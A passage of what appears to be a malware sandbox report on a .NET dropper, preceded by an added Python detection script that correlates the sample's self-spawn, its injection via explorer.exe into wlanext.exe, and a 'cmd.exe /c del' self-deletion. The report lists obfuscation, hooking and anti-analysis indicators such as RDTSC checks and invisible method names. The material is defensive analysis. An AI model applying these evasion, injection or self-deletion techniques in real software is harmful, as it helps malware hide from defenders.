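The process tree recorded above (the sample relaunching itself with an identical command line, explorer.exe starting C:\Windows\SysWOW64\wlanext.exe, and wlanext.exe running cmd.exe /c del on the original sample) is the chain a detection engineer would want to correlate from endpoint process-creation telemetry. One detail matters for the correlation: explorer.exe is not a child of the sample, because the payload reached it by injection (the report's "Injects a PE file into a foreign processes" and "Maps a DLL or memory area into another process" signatures), so the parent chain of the final cmd.exe starts at explorer.exe and never reaches the dropper. The following Python is an added example, not part of the Joe Sandbox report or of any tool it names; the event records are constructed to mirror the tree above, and the PIDs, the parents of the first sample process and of explorer.exe, and the benign control events are made up.

```python
"""Correlate process-creation events into the chain this report records.

Added example, not taken from the Joe Sandbox report. The events below are
constructed to mirror the report's process tree; PIDs are made up.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


# A binary relaunching itself from a user-writable location is the
# interesting case; a browser doing the same from Program Files is not.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")
# cmd.exe /c del <path>.exe, with or without quotes around the path
DEL_EXE = re.compile(r'/c\s+del\s+(?:"([^"]+\.exe)"|(\S+\.exe))', re.IGNORECASE)


def _name(path: str) -> str:
    return os.path.basename(path.replace("\\", "/")).lower()


def _in_dirs(path: str, dirs) -> bool:
    low = path.lower()
    return any(d in low for d in dirs)


def _ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent, grandparent, ... until the chain leaves the event set."""
    chain, seen = [], {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def analyse(events: List[ProcEvent]) -> List[str]:
    by_pid = {e.pid: e for e in events}
    images_seen = {e.image.lower() for e in events}
    findings: List[str] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Rule 1: a user-writable binary starts an identical copy of itself
        # with the same command line (the report shows the sample doing this
        # before the copy's image is replaced by the unpacked payload).
        if (parent is not None
                and parent.image.lower() == e.image.lower()
                and parent.cmdline == e.cmdline
                and _in_dirs(e.image, USER_WRITABLE)):
            findings.append(f"self-spawn: {e.image} (pid {parent.pid} -> {e.pid})")
        if _name(e.image) != "cmd.exe":
            continue
        m = DEL_EXE.search(e.cmdline)
        if m is None:
            continue
        target = (m.group(1) or m.group(2)).lower()
        # Rule 2: the deleted file is the image of a process that ran in this
        # session. Checked against every event, not the parent chain, because
        # injection into explorer.exe breaks the lineage between the sample
        # and the process that finally deletes it.
        if target in images_seen:
            findings.append(f"self-delete: {target} removed by pid {e.pid}")
        # Rule 3: the deleter's parent is a system binary that explorer.exe
        # launched (the report's explorer.exe -> wlanext.exe -> cmd.exe hop).
        chain = _ancestors(e, by_pid)
        if (len(chain) >= 2
                and _in_dirs(chain[0].image, SYSTEM_DIRS)
                and _name(chain[1].image) == "explorer.exe"):
            findings.append(f"explorer-hosted deleter: {chain[1].image} -> "
                            f"{chain[0].image} -> cmd.exe (pid {e.pid})")
    return findings


# Constructed events mirroring the report's tree (PIDs are made up).
SAMPLE = r"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(101, 100, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(102, 2, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(103, 102, r"C:\Windows\SysWOW64\wlanext.exe",
              r'"C:\Windows\SysWOW64\wlanext.exe"'),
    ProcEvent(104, 103, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{SAMPLE}"'),
    ProcEvent(105, 104, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Constructed benign control: explorer launching notepad, and a user deleting
# a text file from a shell. No rule should fire.
BENIGN_EVENTS = [
    ProcEvent(200, 2, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(201, 200, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(202, 200, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c del "C:\Users\user\notes.txt"'),
]

if __name__ == "__main__":
    for line in analyse(SAMPLE_EVENTS):
        print(line)
```

Run against the constructed tree the three rules fire once each: the self-spawn of the sample, the deletion of the sample's own image, and the explorer.exe to wlanext.exe to cmd.exe hop. Rule 2 is the one that survives the injection step, which is why it keys on image paths seen anywhere in the session rather than on ancestry; in production telemetry the image set would be scoped to a host and a time window rather than to one event list.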

          Data Obfuscation

Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | .Net Code: dpaEpnlQP1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | .Net Code: dpaEpnlQP1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.tYEY1UeurGz0Mjb.exe.5640000.7.raw.unpack, -Module-.cs | .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.tYEY1UeurGz0Mjb.exe.5640000.7.raw.unpack, PingPong.cs | .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
(The two method names above consist entirely of zero-width and bidirectional control characters, U+200B to U+200F, U+202A to U+202E and U+206A to U+206F, which the decompiler renders as escaped code points; in a decompiler view without escaping they appear as blank names.)
Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | .Net Code: dpaEpnlQP1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.tYEY1UeurGz0Mjb.exe.2d04c4c.3.raw.unpack, -Module-.cs | .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.tYEY1UeurGz0Mjb.exe.2d04c4c.3.raw.unpack, PingPong.cs | .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: tYEY1UeurGz0Mjb.exe | Static PE information: TimeDateStamp 0xD5C8FEB5 [Sat Aug 28 22:56:53 2083 UTC], a date in the future. Note that .NET compilers building in deterministic mode also write a content hash into this field rather than a real time, so for a managed executable the value on its own is a weak indicator.
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 0_2_05249410 push dword ptr [eax+edx-75h]; iretd 0_2_05249492
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 0_2_0766B528 pushad ; iretd 0_2_0766B52D
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 0_2_0766CDED push FFFFFF8Bh; iretd 0_2_0766CDEF
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_00417884 push esp; iretd 3_2_0041788A
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041E140 push ebx; ret 3_2_0041E2DC
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_00416958 push ebx; retf 3_2_0041695A
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041AAE6 push AD0710D7h; ret 3_2_0041AAED
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0040E2AD push edi; ret 3_2_0040E2B6
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_00416AB9 push 6DD8D03Bh; retf 3_2_00416ABF
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041A3B2 push eax; ret 3_2_0041A3B4
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041D56C push eax; ret 3_2_0041D572
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041D502 push eax; ret 3_2_0041D508
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041D50B push eax; ret 3_2_0041D572
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_00417741 push 00000072h; retf 3_2_0041776D
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0041771C push edx; ret 3_2_00417728
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_004077A4 pushfd ; retf 3_2_004077AE
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019A225F pushad ; ret 3_2_019A27F9
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019A27FA pushad ; ret 3_2_019A27F9
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019D09AD push ecx; mov dword ptr [esp], ecx 3_2_019D09B6
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019A283D push eax; iretd 3_2_019A2858
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019A1368 push eax; iretd 3_2_019A1369
Source: C:\Windows\explorer.exe | Code function: 4_2_0E77DB1E push esp; retn 0000h 4_2_0E77DB1F
Source: C:\Windows\explorer.exe | Code function: 4_2_0E77DB02 push esp; retn 0000h 4_2_0E77DB03
Source: C:\Windows\explorer.exe | Code function: 4_2_0E77D9B5 push esp; retn 0000h 4_2_0E77DAE7
Source: C:\Windows\explorer.exe | Code function: 4_2_107DBB1E push esp; retn 0000h 4_2_107DBB1F
Source: C:\Windows\explorer.exe | Code function: 4_2_107DBB02 push esp; retn 0000h 4_2_107DBB03
Source: C:\Windows\explorer.exe | Code function: 4_2_107DB9B5 push esp; retn 0000h 4_2_107DBAE7
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 5_2_00FF003D push ecx; ret 5_2_00FF0050
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 5_2_035C225F pushad ; ret 5_2_035C27F9
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 5_2_035C27FA pushad ; ret 5_2_035C27F9
Source: tYEY1UeurGz0Mjb.exe | Static PE information: section name: .text entropy: 7.953654666683159
Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack and 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack (both dumps contain the same classes with the same method names; each class is listed once) | High entropy of concatenated method names, per class:
dRsW082dp5fAxcFHX4.cs: 'WGYeQtgTv9', 'YY3eBNmRBs', 'scEeRYtn01', 'wWbe2xnw9q', 'eJ4eVtnFwr', 'n6LeMKUZKV', 'INGe5GhX4T', 'M18elMAqqD', 'i7sehc3Gvs', 'XGIefUfwcC'
e9CZbZW359uUuG8pVA.cs: 'Dispose', 'CtCSF0rMG9', 'TooHIme06Z', 'BpqttQFnPa', 'u9vSdIMZ2n', 'MwGSzhDqs2', 'ProcessDialogKey', 'DgsHTeCbWE', 'U7XHSK1Qv1', 'rllHHwiEig'
PiEigedt0UsmrdZqD9.cs: 'Sb7hSNyD43', 'gy3haL0cyE', 'SJQhEQqAol', 'Xo8hch4SaO', 'ObHhWUtdaW', 'BwihtrrOWi', 'BiOh7rNAuS', 'nRPlNBDuMK', 'NpZl6SnnDJ', 'mG2lF5CV9F'
cBCen5ms7m1F2mpxXh.cs: 'ToString', 'DnNMJDdawF', 'oOhMI9SWb3', 'cErMn4GjEI', 'OnqMYjCE6i', 'XBKMi0AC95', 'Y2PMXxULcR', 'LSdMoukDI7', 'zNGMu0ixhj', 'DDHMZn6Ykb'
GCkChsROVbbw852kkC.cs: 'h2YWDyJhJK', 'GwLW9HiV0y', 'QvWWmXsyxu', 'MBYWkxE0AX', 'eB0Wbjsb9L', 'OgwW36QTWC', 'zofWNDMxUh', 'XPFW6ncIDb', 'HtXWFXCTNP', 'gGbWdc1x2l'
sbk0keoLJCvE80kCE0.cs: 'kx1gcuhyQI', 'xUcgex2nfv', 'LCDg7b4hMq', 'UNh7d67bpC', 'erl7zeFt04', 'BbbgTWhouo', 'mvxgSw3cjR', 'cVBgHZFsG2', 'o4YgaaLDaV', 'RNGgE1wxFR'
aErNlB3Q7IpMi9nowq.cs: 'qDL564wZuF', 'iig5dV0G83', 'imhlTaZAVJ', 'guolShnCh9', 'SHo5JCjX3n', 'Dvm5wwBcwa', 'Bvc5UaipJL', 'IuB5DCO9FM', 'zhl59n09ou', 'OdY5mKCNXV'
qJfBc610jAt7Z2oxmA.cs: 'xyV7xDMXBF', 'lGb7W2Ao7R', 'F3F7tBu5h2', 'zkv7gVgrLl', 'va77sWX67H', 'Wp0tbHLrc4', 'jcct3GcPh9', 'oLmtNtQsIl', 'OXot6TS57g', 'uxmtFbKJhR'
QKgkkGSTkErF1qeMB79.cs: 'P2Chv88hLB', 'mgChyZkgi4', 'zmphpn8Gvl', 'U8thQSfAcO', 'sgmhCIqpLT', 'phYhBx8MZc', 'fAxhG5WmnA', 'cfKhRCDWw9', 'oFTh2ZIri0', 'PdGh8tb9J5'
TEDOsYZeU1iVAGlaOq.cs: 'TT0gveJ5UI', 'IeIgy5ZhbN', 'sAdgpgohQ7', 'txvgQZb7uB', 'XYmgCWBjkV', 'JBUgBgBN8y', 'H0HgGbZiwf', 'BJRgRWWGCe', 'ITkg23bXf4', 'AKYg8ikA7G'
YAeLnKHbdAT8A7k8kE.cs: 'FynplKXih', 'lvTQfBUP2', 'MixBH9XEy', 'rDLGnbIRb', 'Scc2Z0HMH', 'Sov8bqw6E', 'QkeafikY19cTqLj0Bj', 'HMV9Q1wesJi9eKR4Ol', 'gKnlUmRsI', 'Oe3feWQjC'
pMZAdbSaDAoeJDfFRno.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zfIfDDnQxk', 'ayof9IlODx', 'vD8fmHP28f', 'srJfkjemvg', 'l0ofbFwoqB', 'iQXf3WpqIm', 'WCOfNJcpqJ'
keCbWEFb7XK1Qv1hll.cs: 'CfHl17UxBH', 'yOllIgQQnf', 'jpylnA7cLl', 'dNSlYn8uOk', 'wmVlDLBjU4', 't13likY5Et', 'Next', 'Next', 'Next', 'NextBytes'
KnBoLaEC5ps0SdFfvX.cs: 'hv1SgCkChs', 'OVbSsbw852', 'FdpSK5fAxc', 'YHXSA4K7kt', 'GojSVZ55Jf', 'Cc6SM0jAt7', 'sCAkQKg2cvqFHCH0B3', 'VrDpJEputIqp0Ulg96', 'cvnSShAnTf', 'kQjSa1gQ5c'
tT2aB2UoXyApRnSon7.cs: 'dX7LR1vk9V', 'B3OL2xDDy1', 'hnpL1D6Cy6', 'im7LI7s4mD', 'y3ALYW0dt4', 'AEJLi1sOTj', 'GToLoiwNGh', 'mxYLu87ydI', 'EGmLOgQMB6', 'qoZLJWKHMY'
l7ktCZ8Ijwwk91ojZ5.cs: 'FYwtCMZCJd', 'gTqtG3gJdB', 'XABenZyeeJ', 'QgSeY1bnQ2', 'nOOeipIr4r', 'PqpeXyB4IA', 'rl2eoiVghU', 'xuQeuqmQRv', 'hPyeZgVeUj', 'bxSeOkvgeU'
aEgGTusdp8Dk1PnDG2.cs: 'ypVaxeNXId', 'X22ac2lT1o', 'lp8aW69TVk', 'QsbaePtRmt', 'NxRatLP8WN', 'fYHa7itBuB', 'ehnagjIMVa', 'hT8ascyKyx', 'QATaqDAYmQ', 'f12aKNDIvB'
SvIMZ26nZwGhDqs2Rg.cs: 'dyDlcIp0sx', 'nfTlWkgpnw', 'GXpleshfA2', 'aAWltBtUvU', 'hkVl7b1XKR', 'NbwlgLGRvO', 'qhTlsAgoEO', 'f0klqaXkdm', 'ATIlKa7FCD', 'Q3XlA9sMQ9'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, dRsW082dp5fAxcFHX4.csHigh entropy of concatenated method names: 'WGYeQtgTv9', 'YY3eBNmRBs', 'scEeRYtn01', 'wWbe2xnw9q', 'eJ4eVtnFwr', 'n6LeMKUZKV', 'INGe5GhX4T', 'M18elMAqqD', 'i7sehc3Gvs', 'XGIefUfwcC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, e9CZbZW359uUuG8pVA.csHigh entropy of concatenated method names: 'Dispose', 'CtCSF0rMG9', 'TooHIme06Z', 'BpqttQFnPa', 'u9vSdIMZ2n', 'MwGSzhDqs2', 'ProcessDialogKey', 'DgsHTeCbWE', 'U7XHSK1Qv1', 'rllHHwiEig'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, PiEigedt0UsmrdZqD9.csHigh entropy of concatenated method names: 'Sb7hSNyD43', 'gy3haL0cyE', 'SJQhEQqAol', 'Xo8hch4SaO', 'ObHhWUtdaW', 'BwihtrrOWi', 'BiOh7rNAuS', 'nRPlNBDuMK', 'NpZl6SnnDJ', 'mG2lF5CV9F'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, cBCen5ms7m1F2mpxXh.csHigh entropy of concatenated method names: 'ToString', 'DnNMJDdawF', 'oOhMI9SWb3', 'cErMn4GjEI', 'OnqMYjCE6i', 'XBKMi0AC95', 'Y2PMXxULcR', 'LSdMoukDI7', 'zNGMu0ixhj', 'DDHMZn6Ykb'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, GCkChsROVbbw852kkC.csHigh entropy of concatenated method names: 'h2YWDyJhJK', 'GwLW9HiV0y', 'QvWWmXsyxu', 'MBYWkxE0AX', 'eB0Wbjsb9L', 'OgwW36QTWC', 'zofWNDMxUh', 'XPFW6ncIDb', 'HtXWFXCTNP', 'gGbWdc1x2l'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, sbk0keoLJCvE80kCE0.csHigh entropy of concatenated method names: 'kx1gcuhyQI', 'xUcgex2nfv', 'LCDg7b4hMq', 'UNh7d67bpC', 'erl7zeFt04', 'BbbgTWhouo', 'mvxgSw3cjR', 'cVBgHZFsG2', 'o4YgaaLDaV', 'RNGgE1wxFR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aErNlB3Q7IpMi9nowq.csHigh entropy of concatenated method names: 'qDL564wZuF', 'iig5dV0G83', 'imhlTaZAVJ', 'guolShnCh9', 'SHo5JCjX3n', 'Dvm5wwBcwa', 'Bvc5UaipJL', 'IuB5DCO9FM', 'zhl59n09ou', 'OdY5mKCNXV'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, qJfBc610jAt7Z2oxmA.csHigh entropy of concatenated method names: 'xyV7xDMXBF', 'lGb7W2Ao7R', 'F3F7tBu5h2', 'zkv7gVgrLl', 'va77sWX67H', 'Wp0tbHLrc4', 'jcct3GcPh9', 'oLmtNtQsIl', 'OXot6TS57g', 'uxmtFbKJhR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, QKgkkGSTkErF1qeMB79.csHigh entropy of concatenated method names: 'P2Chv88hLB', 'mgChyZkgi4', 'zmphpn8Gvl', 'U8thQSfAcO', 'sgmhCIqpLT', 'phYhBx8MZc', 'fAxhG5WmnA', 'cfKhRCDWw9', 'oFTh2ZIri0', 'PdGh8tb9J5'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, TEDOsYZeU1iVAGlaOq.csHigh entropy of concatenated method names: 'TT0gveJ5UI', 'IeIgy5ZhbN', 'sAdgpgohQ7', 'txvgQZb7uB', 'XYmgCWBjkV', 'JBUgBgBN8y', 'H0HgGbZiwf', 'BJRgRWWGCe', 'ITkg23bXf4', 'AKYg8ikA7G'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, YAeLnKHbdAT8A7k8kE.csHigh entropy of concatenated method names: 'FynplKXih', 'lvTQfBUP2', 'MixBH9XEy', 'rDLGnbIRb', 'Scc2Z0HMH', 'Sov8bqw6E', 'QkeafikY19cTqLj0Bj', 'HMV9Q1wesJi9eKR4Ol', 'gKnlUmRsI', 'Oe3feWQjC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, pMZAdbSaDAoeJDfFRno.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zfIfDDnQxk', 'ayof9IlODx', 'vD8fmHP28f', 'srJfkjemvg', 'l0ofbFwoqB', 'iQXf3WpqIm', 'WCOfNJcpqJ'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, keCbWEFb7XK1Qv1hll.csHigh entropy of concatenated method names: 'CfHl17UxBH', 'yOllIgQQnf', 'jpylnA7cLl', 'dNSlYn8uOk', 'wmVlDLBjU4', 't13likY5Et', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, KnBoLaEC5ps0SdFfvX.csHigh entropy of concatenated method names: 'hv1SgCkChs', 'OVbSsbw852', 'FdpSK5fAxc', 'YHXSA4K7kt', 'GojSVZ55Jf', 'Cc6SM0jAt7', 'sCAkQKg2cvqFHCH0B3', 'VrDpJEputIqp0Ulg96', 'cvnSShAnTf', 'kQjSa1gQ5c'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, tT2aB2UoXyApRnSon7.csHigh entropy of concatenated method names: 'dX7LR1vk9V', 'B3OL2xDDy1', 'hnpL1D6Cy6', 'im7LI7s4mD', 'y3ALYW0dt4', 'AEJLi1sOTj', 'GToLoiwNGh', 'mxYLu87ydI', 'EGmLOgQMB6', 'qoZLJWKHMY'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, l7ktCZ8Ijwwk91ojZ5.csHigh entropy of concatenated method names: 'FYwtCMZCJd', 'gTqtG3gJdB', 'XABenZyeeJ', 'QgSeY1bnQ2', 'nOOeipIr4r', 'PqpeXyB4IA', 'rl2eoiVghU', 'xuQeuqmQRv', 'hPyeZgVeUj', 'bxSeOkvgeU'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.csHigh entropy of concatenated method names: 'ypVaxeNXId', 'X22ac2lT1o', 'lp8aW69TVk', 'QsbaePtRmt', 'NxRatLP8WN', 'fYHa7itBuB', 'ehnagjIMVa', 'hT8ascyKyx', 'QATaqDAYmQ', 'f12aKNDIvB'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, SvIMZ26nZwGhDqs2Rg.csHigh entropy of concatenated method names: 'dyDlcIp0sx', 'nfTlWkgpnw', 'GXpleshfA2', 'aAWltBtUvU', 'hkVl7b1XKR', 'NbwlgLGRvO', 'qhTlsAgoEO', 'f0klqaXkdm', 'ATIlKa7FCD', 'Q3XlA9sMQ9'

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 4196, type: MEMORYSTR
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | API/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | API/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: BB9904 second address: BB990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: BB9B7E second address: BB9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: 1320000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: 2CA0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: 1320000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: 7C00000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: 8C00000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: 8DB0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: 9DB0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: A120000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: B120000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: C120000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: D120000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: E120000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: F120000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Memory allocated: F7E0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1877
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 8068
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 875
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 881
          Source: C:\Windows\SysWOW64\wlanext.exe | Window / User API: threadDelayed 734
